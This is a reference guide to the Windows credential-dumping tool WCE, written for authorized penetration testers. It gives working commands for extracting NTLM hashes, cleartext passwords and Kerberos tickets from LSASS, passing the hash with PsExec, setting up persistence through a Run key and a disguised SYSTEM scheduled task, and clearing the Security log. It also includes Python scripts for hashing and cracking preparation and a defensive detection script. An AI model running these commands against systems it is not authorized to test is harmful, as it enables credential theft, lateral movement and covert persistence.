WCE (Windows Credentials Editor)
Overview
WCE (Windows Credentials Editor) is a post-exploitation tool by Hernan Ochoa (Amplia Security) for reading and manipulating the Windows credentials that the Local Security Authority process (LSASS) keeps in memory. It lists the NTLM credentials (LM and NT hashes) of every logon session, can dump cleartext passwords cached by the WDigest authentication package and Kerberos tickets, and can replace the NTLM credentials of a logon session so that a supplied hash is used for outbound authentication (pass-the-hash). Authorized penetration testers and red teams use it to demonstrate credential theft and lateral movement on Windows hosts.
Prerequisites
- Windows system with local administrator rights; WCE needs SeDebugPrivilege (or SYSTEM) to read LSASS memory
- Understanding of Windows logon sessions, NTLM hashes and Kerberos tickets
- Written authorization to perform credential testing on the target systems
Installation
Direct Download
Download the precompiled binary from Amplia Security's release page. Separate 32-bit, 64-bit and universal builds are distributed; pick the one matching the target OS. Verify the checksum before executing anything, and expect antivirus to quarantine the file on a protected workstation, since WCE is signatured by virtually every product:
# Compute the SHA-256 of the downloaded binary and compare it with the hash recorded in your tooling inventory
certutil -hashfile wce.exe SHA256
Source Availability
WCE is distributed as binaries only; its source code has never been published, so there is nothing to compile and no gcc or MSVC build step exists. If you need a tool with similar capabilities that you can build and audit yourself, Mimikatz (see Related Tools) is open source.
File Structure
wce/
├── wce.exe # Main executable (32-bit in the x86 package; the x64 package ships a 64-bit build)
├── wce-universal.exe # Universal build that runs on both 32- and 64-bit Windows
├── README.txt
└── CHANGELOG
Basic Commands
| Option | Description |
|---|---|
| wce -l | List logon sessions and their NTLM credentials (the default action when no option is given) |
| wce -s <user>:<domain>:<LMhash>:<NThash> | Replace the NTLM credentials of the current logon session (pass-the-hash) |
| wce -c <cmd> | Run <cmd> in a new logon session carrying the credentials given with -s |
| wce -r | List sessions repeatedly, refreshing every 5 seconds (-r<seconds> changes the interval) |
| wce -e | List sessions repeatedly, refreshing on every logon event |
| wce -o <file> | Save all output to <file> |
| wce -i <luid> | Operate on the logon session with this LUID instead of the current one |
| wce -d <luid> | Delete the NTLM credentials of a logon session |
| wce -g <password> | Generate the LM and NT hashes of a password |
| wce -K | Dump Kerberos tickets to files (Unix credential-cache and WCE's own Windows format) |
| wce -k | Read Kerberos tickets from a file and insert them into the Windows ticket cache |
| wce -w | Dump cleartext passwords cached by the digest (WDigest) authentication package |
| wce -v | Verbose output (adds session details such as the logon session LUID) |
| wce -h | Display help |
Credential Extraction
List All Credentials
# List every logon session and its NTLM credentials (this is the default action, so "wce" alone does the same)
wce -l
# Output format, one line per logon session, after the WCE banner:
# username:domain:LMhash:NThash
# Administrator:DOMAIN:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C
# AAD3B435B51404EEAAD3B435B51404EE is the LM hash of the empty password: LM hashing is disabled by default
# since Windows Vista/Server 2008, so this value appears on nearly every modern system.
# 8846F7EAEE8FB117AD06BDD830B7586C is the NT hash of "password".
# Cleartext passwords are not part of -l output; use -w (see below) for those.
Target a Specific Logon Session
# WCE does not read credentials out of arbitrary processes (explorer.exe, svchost.exe, ...);
# it enumerates LSA logon sessions, each identified by a LUID. Show the LUID of every session:
wce -l -v
# Operate on one session by LUID instead of the current session, e.g. when injecting credentials with -s
wce -i <luid> -s <user>:<domain>:<LMhash>:<NThash>
# Delete the NTLM credentials of a session
wce -d <luid>
Verbose Output
# Add logon session details to the credential list
wce -l -v
# Verbose output adds, per entry, details such as the logon session LUID (the value -i and -d take).
# Two things the listing never contains: cleartext passwords (use -w) and process IDs, because
# credentials belong to logon sessions, not to processes.
NTLM Hash Extraction
Extract NTLM Hashes
# NTLM hashes are the default output; there is no separate hash-only option
wce -l
# Output format:
# username:domain:lmhash:nthash
# Administrator:WORKGROUP:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C
Save Hashes to File
# Write the listing to a file for offline cracking (-o works where shell redirection is unavailable,
# e.g. inside a scheduled task command)
wce -l -o hashes.txt
# hashcat -m 1000 (NTLM) expects bare NT hashes, one per line
# john's pwdump format is username:uid:lmhash:nthash::: (WCE does not print a uid; any number works)
Identify Hash Types
# Show only entries that still carry a real LM hash
wce -l | findstr /v /i "aad3b435b51404eeaad3b435b51404ee"
# aad3b435b51404eeaad3b435b51404ee is the LM hash of the empty password, i.e. LM storage is disabled.
# findstr /v also passes the banner lines through, since they do not contain the pattern.
# 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty password (accounts with no password set).
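The hash values above can be checked without any cracking tool. The following Python script is an added example, not part of the original page or of WCE: it computes the NT hash exactly as `wce -g <password>` does for the NT half (MD4 over the UTF-16LE encoding of the password) and uses it to test a candidate password against the NT field of a dumped line. MD4 is implemented inline because `hashlib`'s md4 is disabled under OpenSSL 3 on many systems; the LM half needs DES and is deliberately left out.

```python
"""Added example: NT hash = MD4(UTF-16LE(password)), as printed by 'wce -g', plus an offline candidate check."""
import struct

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: little-endian length padding, three 16-step rounds, 128-bit digest."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    # (function, additive constant, shift schedule, message-word order) for each round
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        w = state[:]
        for fn, const, shifts, order in rounds:
            for step in range(16):
                i = (-step) % 4  # registers are updated in the order a, d, c, b, a, ...
                w[i] = _rotl((w[i] + fn(w[(i + 1) % 4], w[(i + 2) % 4], w[(i + 3) % 4])
                              + x[order[step]] + const) & _MASK, shifts[step % 4])
        state = [(s + v) & _MASK for s, v in zip(state, w)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash as WCE prints it: uppercase hex of MD4 over the UTF-16LE password.
    There is no salt, so identical passwords give identical hashes across accounts and domains."""
    return md4(password.encode("utf-16-le")).hex().upper()


def matches(dumped_nt: str, candidate: str) -> bool:
    """Offline check of one candidate against the NT field of a 'wce -l' line (case-insensitive)."""
    return nt_hash(candidate) == dumped_nt.strip().upper()


if __name__ == "__main__":
    # The line format from the listing above; 8846F7... is the NT hash of "password"
    dumped = "Administrator:DOMAIN:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C"
    nt = dumped.split(":")[3]
    for cand in ("P@ssw0rd123", "password", ""):
        print(f"{cand!r:15} -> {nt_hash(cand)}  match={matches(nt, cand)}")
```

Because the NT hash is unsalted, the same function turns any wordlist into a lookup against every NT field in a dump at once, which is why a dumped NT hash is as good as the password for pass-the-hash and why reuse across accounts is immediately visible in the listing.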
Kerberos Ticket Extraction
Extract Kerberos Tickets
# Dump the Kerberos tickets of the current logon sessions to files in the working directory
wce -K
# Tickets are written in two formats: a Unix credential cache (usable with MIT Kerberos tools by
# pointing KRB5CCNAME at the file) and WCE's own Windows format. Both the ticket-granting ticket (TGT)
# and service tickets are included, together with their session keys.
Export Tickets for Pass-the-Ticket
# Copy the files off the host, then on the machine where the tickets should be used load the
# WCE-format file into the Windows ticket cache
wce -k
# The Unix-format cache can be used from a Linux host via KRB5CCNAME, and Mimikatz's kerberos::ptt
# also accepts ccache files directly
Logon Session Monitoring
Watch for New Sessions
# WCE enumerates LSA logon sessions; it cannot be pointed at a process by name or PID. To catch
# credentials that appear after you start (interactive logons, scheduled tasks, service restarts), keep listing:
wce -r
# Refresh every 5 seconds; -r<seconds> changes the interval, e.g. wce -r30
wce -e
# Refresh whenever a logon event occurs instead of on a timer
Dump Credentials from Service Accounts
# Services that run under domain or local accounts have their own logon sessions, so their credentials
# appear in the normal listing under the account name (the SQL Server, IIS application pool or backup
# service account, for example):
wce -l
# Combine with -e to capture a service account's credentials the moment its service starts
Advanced Usage
Save Output to a File
# Write everything to a file instead of the console
wce -l -o output.txt
# Prefer -o over shell redirection when WCE runs from a scheduled task or a Run key, where no shell
# is present to interpret the > operator
Filter Credentials by Domain
# The second field of each line is the domain, so match it together with its surrounding colons
wce -l | findstr /i ":DOMAIN:"
# Everything else: local accounts (and the banner lines, which findstr /v passes through)
wce -l | findstr /v /i ":DOMAIN:"
Continuous Monitoring
# Take a snapshot, wait, take another and diff them
wce -l -o credentials_snapshot.txt
timeout /t 300
wce -l -o credentials_update.txt
fc credentials_snapshot.txt credentials_update.txt
# wce -r runs the same refresh loop for you without the manual diff
Integration with Other Tools
Pass-the-Hash with WCE
# Take an NT hash from the listing (the LM field may be the empty-LM value)
wce -l
# Replace the current logon session's NTLM credentials with the stolen hash; from then on, anything in
# this session that authenticates with NTLM (net use, Sysinternals PsExec, ...) presents those credentials
wce -s Administrator:DOMAIN:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C
# Or spawn a new shell that carries the injected credentials and run PsExec from it
wce -s Administrator:DOMAIN:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C -c cmd.exe
psexec \\targethost cmd.exe
# Sysinternals PsExec has no hash option: -h elevates, and -u/-p take a username and a cleartext
# password. Hash-based PsExec is provided by Impacket's psexec.py (-hashes LMhash:NThash) or Metasploit.
Credential Dumping Pipeline
# Extract and prepare for cracking. sed is not present on a stock Windows host; use for /f instead
wce -l -o hashes.txt
# Bare NT hashes for hashcat -m 1000 (use %%a..%%d instead of %a..%d inside a .bat file).
# The findstr filter keeps only lines ending in two hex fields, which drops the banner; the parentheses
# around echo stop cmd from reading a trailing digit as a file-handle redirection.
for /f "tokens=1-4 delims=:" %a in ('findstr /r /i ":[0-9A-F]*:[0-9A-F]*$" hashes.txt') do @(echo %d)>>nthashes.txt
# Usernames
for /f "tokens=1-4 delims=:" %a in ('findstr /r /i ":[0-9A-F]*:[0-9A-F]*$" hashes.txt') do @(echo %a)>>usernames.txt
# Caveat: for /f collapses consecutive delimiters, so an entry with an empty domain field shifts its tokens
# GPU cracking: hashcat -m 1000 nthashes.txt wordlist.txt
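The field splitting above is fragile (banner lines, empty domain fields, duplicate hashes) and is easier to get right off the host. The following Python script is an added example, not part of the original page or of WCE: it parses the `username:domain:LMhash:NThash` lines of a saved listing while skipping the banner, emits hashcat -m 1000 and john pwdump input, flags entries that still carry a real LM hash (the Identify Hash Types check), and diffs two snapshots the way the Continuous Monitoring section does with fc. The sample listing is constructed; only the hash constants are real, well-known values (empty LM, empty NT, and the LM and NT hashes of "password").

```python
"""Added example: post-process WCE 'user:domain:LMhash:NThash' listings for cracking and snapshot diffing."""
import re
from typing import Dict, List

EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"  # LM hash of the empty password: LM storage is disabled
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"  # NT hash of the empty password: account has no password

# A credential line is exactly four colon-separated fields ending in two 32-hex-digit hashes.
# WCE's banner and "Use -h for help." never match, so they need no special casing.
_CRED_RE = re.compile(r"^([^:]+):([^:]*):([0-9A-Fa-f]{32}):([0-9A-Fa-f]{32})$")

Record = Dict[str, str]


def parse_wce_output(text: str) -> List[Record]:
    """One record per credential line; banner, blank and malformed lines are skipped."""
    records: List[Record] = []
    for line in text.splitlines():
        m = _CRED_RE.match(line.strip())
        if m:
            user, domain, lm, nt = m.groups()
            records.append({"user": user, "domain": domain, "lm": lm.upper(), "nt": nt.upper()})
    return records


def has_real_lm(record: Record) -> bool:
    """True when the LM field is not the empty-password constant, i.e. LM hashing is still enabled."""
    return record["lm"] != EMPTY_LM


def to_hashcat_nt(records: List[Record]) -> List[str]:
    """hashcat -m 1000 wants bare NT hashes: deduplicate and drop empty-password hashes."""
    out: List[str] = []
    for r in records:
        if r["nt"] != EMPTY_NT and r["nt"] not in out:
            out.append(r["nt"])
    return out


def to_john_pwdump(records: List[Record]) -> List[str]:
    """john's NT/LM formats read pwdump lines 'user:uid:LMhash:NThash:::'; WCE has no uid, 0 is a placeholder."""
    return [f"{r['user']}:0:{r['lm']}:{r['nt']}:::" for r in records]


def new_credentials(before: str, after: str) -> List[Record]:
    """Credential lines present in the later snapshot only (what fc shows, minus banner noise)."""
    key = lambda r: (r["user"], r["domain"], r["lm"], r["nt"])
    seen = {key(r) for r in parse_wce_output(before)}
    return [r for r in parse_wce_output(after) if key(r) not in seen]


# Constructed sample resembling 'wce -l' output (banner wording approximated, hosts and users invented)
SNAPSHOT_1 = """WCE v1.4beta (X64) (Windows Credentials Editor) - (c) 2010-2013 Amplia Security
Use -h for help.

Administrator:WS01:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C
Guest:WS01:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
legacyadmin:WS01:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
"""
# Five minutes later a domain service account has logged on (constructed NT hash)
SNAPSHOT_2 = SNAPSHOT_1 + "svc_sql:CORP:AAD3B435B51404EEAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF\n"

if __name__ == "__main__":
    recs = parse_wce_output(SNAPSHOT_2)
    print("hashcat -m 1000 input:", *to_hashcat_nt(recs), sep="\n  ")
    print("john pwdump input:", *to_john_pwdump(recs), sep="\n  ")
    print("entries with a real LM hash:", [r["user"] for r in recs if has_real_lm(r)])
    print("new since snapshot 1:", [r["user"] for r in new_credentials(SNAPSHOT_1, SNAPSHOT_2)])
```

Deduplicating before cracking matters beyond speed: Administrator and legacyadmin in the sample share an NT hash, which is a password-reuse finding in its own right, and the legacyadmin LM hash shows that host still stores LM hashes, so its passwords fall to a 14-character case-insensitive DES attack regardless of NT hash strength.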
Integration with Mimikatz
# Mimikatz's sekurlsa module reads the same LSASS logon sessions but covers more providers
# (msv, wdigest, kerberos, tspkg, credman) and is maintained for current Windows builds.
# Run it from an elevated prompt to cross-check WCE's results:
# mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
# On Windows builds newer than WCE's last release, expect Mimikatz to find credentials that WCE misses.
Secure Credential Handling
Protect Exported Credentials
# Write output to a file you control rather than leaving it in the console buffer
wce -l -o creds.txt
# certutil -hashfile only computes a checksum; it does not encrypt anything. Encrypt the file with EFS
# (bound to the current user's certificate) or with the engagement's approved tooling:
cipher /e creds.txt
# There is no del /secure. Delete the file, then overwrite the free space on that volume so the
# plaintext blocks cannot be recovered (slow, but it is the only built-in wipe):
del creds.txt
cipher /w:%cd%
Log Credential Access
# Keep an operator log of when and by whom WCE was run, but never append the credentials to it
echo [%date% %time%] WCE executed by %username% on %computername% >> audit.log
wce -l -o creds_%computername%.txt
# Encrypt the log like the credential file (cipher /s: is for directories, not single files)
cipher /e audit.log
Detection and Evasion
Stealth Extraction
# Running from %temp% and writing into an alternate data stream hides the output from a plain dir
cd %temp%
wce.exe -l > output.txt:hidden
# but not from dir /r, which lists every stream; deleting the carrier file removes the stream with it
dir /r
del output.txt
# The binary itself is the bigger problem: WCE is signatured by virtually every antivirus product,
# so on a protected host it is usually quarantined before it runs at all
Timing Considerations
# Credentials exist in LSASS only for sessions that are currently logged on, so run during business
# hours when users and service accounts are active, or use -e to catch logons as they happen
# A user's session stays present while the screen is locked; it disappears at logoff
# Process creation (Security 4688 / Sysmon 1), LSASS access (Sysmon 10) and Prefetch artifacts are
# recorded regardless of timing; choosing a quiet window only avoids a scheduled AV scan, nothing more
Troubleshooting
No Credentials Found
# Issue: the banner prints but no credential lines follow
# Solution 1: confirm you are elevated and hold SeDebugPrivilege (it is listed only in an elevated prompt)
whoami /priv | findstr SeDebugPrivilege
# Solution 2: match the binary to the OS architecture; a 32-bit WCE cannot read a 64-bit LSASS
wmic os get osarchitecture
# Solution 3: WCE's last public release predates Windows 10; on newer builds try the universal binary
# or force safe mode, and fall back to Mimikatz if that also fails
wce -f -l
Access Denied Error
# Issue: "Access Denied" when running WCE
# Solution: run from an elevated prompt (UAC-approved administrator) or as SYSTEM
# Method 1: right-click cmd.exe > Run as administrator, then
wce.exe -l
# Method 2: Sysinternals PsExec to get a SYSTEM shell
psexec -s -i cmd.exe
# Method 3: scheduled task as SYSTEM. /ru SYSTEM is required (without it the task runs as the creating
# user), and > redirection does not work inside /tr because no shell runs the command, so use -o
schtasks /create /tn "CredDump" /tr "C:\tools\wce.exe -o C:\tools\out.txt" /sc once /st 12:00 /ru SYSTEM
Missing Credentials
# Issue: expected credentials not shown
# Possible causes:
# 1. The account is not logged on (credentials exist only in active logon sessions)
# 2. WDigest no longer caches cleartext passwords (default since Windows 8.1/Server 2012 R2), so -w is empty
# 3. LSA Protection (RunAsPPL) or Credential Guard prevents reading usable secrets from LSASS
# Solution: list the active sessions and check whether the expected account is among them
wce -l -v
# Credentials appear when the account logs on or a service starts under it; wce -e waits for exactly that
Operational Security
OPSEC Best Practices
# 1. Write to a file with -o instead of leaving credentials in the console buffer.
#    %random% is re-evaluated every time it is expanded, so capture the name once if you need it later
set OUT=%temp%\out_%random%.txt
wce.exe -o %OUT%
# 2. Transfer the file over the engagement's encrypted channel and encrypt it at rest. gzip is not
#    present on a stock Windows host, and compression is not a substitute for encryption
# 3. Delete WCE and its output when done
del %OUT%
del wce.exe
Detection Mitigation
# There is no quiet way to run WCE on a monitored host; know what each "cleanup" step actually does:
# 1. Clearing the Security log removes the 4688 process-creation entries but writes event 1102
#    ("The audit log was cleared") into the fresh log, one of the highest-fidelity alerts a SOC has
wevtutil cl Security
# 2. history -c is a bash command. cmd.exe keeps no persistent history (doskey /history shows the current
#    session only); PowerShell's PSReadLine history file is at (Get-PSReadLineOption).HistorySavePath
# 3. There is no Disable-PSLogging cmdlet. Script block and module logging are controlled by Group
#    Policy, and switching them off locally is itself a logged and conspicuous change
# 4. Windows Update notifications have nothing to do with detection; that step can be dropped
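The defender's view of the Stealth Extraction and Detection Mitigation steps above is worth seeing side by side. The following Python script is an added example, not part of the original page or of WCE: it runs three detection rules over constructed Windows event records shaped like Security and Sysmon EventData fields (an unexpected process reading lsass.exe memory via Sysmon event 10, a known dumper name or a pass-the-hash command line in Security event 4688, and the Security log being cleared in event 1102). The allowlist of legitimate LSASS readers is an assumption to tune per environment, not a vendor list, and the sample events are invented.

```python
"""Added example: triage constructed Windows events for the artifacts a WCE run leaves behind."""
import re
from typing import Dict, List, Tuple

Event = Dict[str, object]
Alert = Tuple[str, str]

SYSMON = "Microsoft-Windows-Sysmon/Operational"
# Processes that routinely open lsass.exe on a default install (assumption; tune per environment)
LSASS_READERS = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wmiprvse.exe",
}
PROCESS_VM_READ = 0x0010  # the access right any memory reader must hold on lsass.exe
KNOWN_DUMPER_NAMES = {"wce.exe", "wce-universal.exe"}
# '-s user:domain:LMhash:NThash' on a command line is the pass-the-hash shape regardless of the binary's name
PTH_CMDLINE = re.compile(r"-s\s+\S+:\S*:[0-9a-f]{32}:[0-9a-f]{32}", re.I)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: List[Event]) -> List[Alert]:
    """Return (severity, message) for every event that matches one of the three rules."""
    alerts: List[Alert] = []
    for ev in events:
        channel, eid = ev.get("Channel"), ev.get("EventID")
        if channel == SYSMON and eid == 10:
            # ProcessAccess: a non-allowlisted process reading lsass memory is the canonical dumper signal
            source = str(ev.get("SourceImage", "")).lower()
            target = _basename(str(ev.get("TargetImage", "")))
            granted = int(str(ev.get("GrantedAccess", "0x0")), 16)
            if target == "lsass.exe" and source not in LSASS_READERS and granted & PROCESS_VM_READ:
                alerts.append(("high", f"lsass.exe memory read by {source} (GrantedAccess {ev['GrantedAccess']})"))
        elif channel == "Security" and eid == 4688:
            # Process creation: name matching is defeated by renaming; the command-line rule needs
            # "Include command line in process creation events" enabled to populate CommandLine
            image = _basename(str(ev.get("NewProcessName", "")))
            cmdline = str(ev.get("CommandLine", ""))
            if image in KNOWN_DUMPER_NAMES or PTH_CMDLINE.search(cmdline):
                alerts.append(("medium", f"credential tool process created: {cmdline or image}"))
        elif channel == "Security" and eid == 1102:
            # The audit log was cleared: written to the new, empty log, so wevtutil cl never hides itself
            alerts.append(("high", f"Security log cleared by {ev.get('SubjectUserName')}"))
    return alerts


# Constructed records in the order the commands in this section would produce them
SAMPLE_EVENTS: List[Event] = [
    {"Channel": SYSMON, "EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},  # benign: allowlisted, no VM_READ
    {"Channel": "Security", "EventID": 4688, "NewProcessName": r"C:\Users\op\AppData\Local\Temp\wce.exe",
     "CommandLine": "wce.exe -l -o output.txt:hidden"},
    {"Channel": SYSMON, "EventID": 10, "SourceImage": r"C:\Users\op\AppData\Local\Temp\wce.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"Channel": "Security", "EventID": 4688, "NewProcessName": r"C:\Users\op\AppData\Local\Temp\svc.exe",
     "CommandLine": "svc.exe -s Administrator:CORP:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -c cmd.exe"},
    {"Channel": "Security", "EventID": 1102, "SubjectUserName": "op"},
]

if __name__ == "__main__":
    for severity, message in triage(SAMPLE_EVENTS):
        print(f"[{severity:6}] {message}")
```

Note what survives each evasion step in the sample: renaming the binary to svc.exe defeats the name rule but not the lsass-access rule or the command-line shape, writing into an alternate data stream changes nothing a process-level sensor sees, and clearing the log converts several medium alerts into one high-fidelity 1102.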
Practical Examples
Red Team Credential Harvesting
# Persistence via a Run key. Redirection does not work in a Run value (no shell interprets >), so use -o
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Cred" /d "C:\Windows\Temp\wce.exe -o C:\Windows\Temp\log.txt"
# Periodic dumps with a scheduled task; /ru SYSTEM so it does not depend on the creating user's session
schtasks /create /tn "System Maintenance" /tr "C:\Windows\Temp\wce.exe -o C:\Windows\Temp\log.txt" /sc hourly /ru SYSTEM
# Exfiltration: certutil -urlcache -f downloads a URL to the local file named after it; it uploads
# nothing, so the original command sent no data. Move the file over the engagement's C2 channel
# instead, and treat plaintext credentials left in C:\Windows\Temp as a finding against your own
# tradecraft: encrypt them at rest and remove them when the objective is met.
Privilege Escalation Chain
# 1. List every logon session; the current user's and any service accounts' credentials appear together
wce -l
# 2. If WDigest still caches cleartext on this host, collect the passwords as well
wce -w
# 3. Use a service account's hash for lateral movement from a new shell that carries it
wce -s serviceaccount:DOMAIN:AAD3B435B51404EEAAD3B435B51404EE:<NThash> -c cmd.exe
psexec \\target cmd.exe
# With a recovered cleartext password, Sysinternals PsExec can authenticate directly:
# psexec \\target -u DOMAIN\serviceaccount -p <password> cmd.exe
Credential Audit
# Comprehensive audit script (save as audit.bat and run from an elevated prompt)
@echo off
set REPORT=audit_report_%computername%.txt
echo [*] WCE Credential Audit - %date% %time% > %REPORT%
echo [*] Logon sessions and NTLM hashes (verbose): >> %REPORT%
wce -l -v >> %REPORT%
echo [*] Cleartext passwords (WDigest): >> %REPORT%
wce -w >> %REPORT%
echo [*] Kerberos tickets (ticket files are written to the current directory): >> %REPORT%
wce -K >> %REPORT%
echo Audit complete - results in %REPORT%
cipher /e %REPORT%
Comparison with Similar Tools
| Tool | Purpose | Focus |
|---|---|---|
| WCE | NTLM hash, WDigest cleartext and Kerberos ticket extraction; pass-the-hash | LSASS logon sessions on Windows |
| Mimikatz | Credential extraction plus Kerberos ticket forging, DPAPI and LSA secrets | Broad Windows credential and authentication abuse |
| ProcDump | Sysinternals memory dump utility | Dumping lsass.exe for offline parsing (e.g. Mimikatz sekurlsa::minidump) |
| PowerSploit | PowerShell post-exploitation framework | Recon, privilege escalation, persistence; Invoke-Mimikatz |
| Responder | LLMNR, NBT-NS and mDNS poisoner | Capturing NetNTLM challenge-responses on the network |
Limitations
- Requires local administrator rights with SeDebugPrivilege, or SYSTEM
- Cleartext passwords come only from WDigest, which stopped caching them by default in Windows 8.1/Server 2012 R2 (and can be switched off on older systems with KB2871997 and the UseLogonCredential registry value); only active logon sessions are covered
- Windows only, closed source, and not updated since its last beta release, so current Windows 10/11 builds are frequently unsupported
- LSA Protection (RunAsPPL) blocks unsigned processes from opening LSASS, and Credential Guard isolates the secrets so that even a successful read yields nothing usable
- Service account credentials are present only while the service's logon session exists
Related Tools
- Mimikatz: actively maintained, open-source, broader Windows credential extraction and manipulation
- Responder: network-based capture of NetNTLM hashes through name-resolution poisoning
- LaZagne: recovers passwords stored by applications (browsers, mail clients, Wi-Fi) on Windows, Linux and macOS
- CrackMapExec: network-wide pass-the-hash, credential validation and lateral movement
References
- Windows Credentials Editor (WCE) repository and README, Amplia Security
- NTLM hash specification, Microsoft Docs
- RFC 4120: The Kerberos Network Authentication Service (V5)
- Credential Guard, Microsoft Security Blog
Legal Notice
WCE is intended for authorized security testing, red team exercises and defensive research. Unauthorized access to computer systems is illegal. Use it only on systems you own or have explicit written permission to test.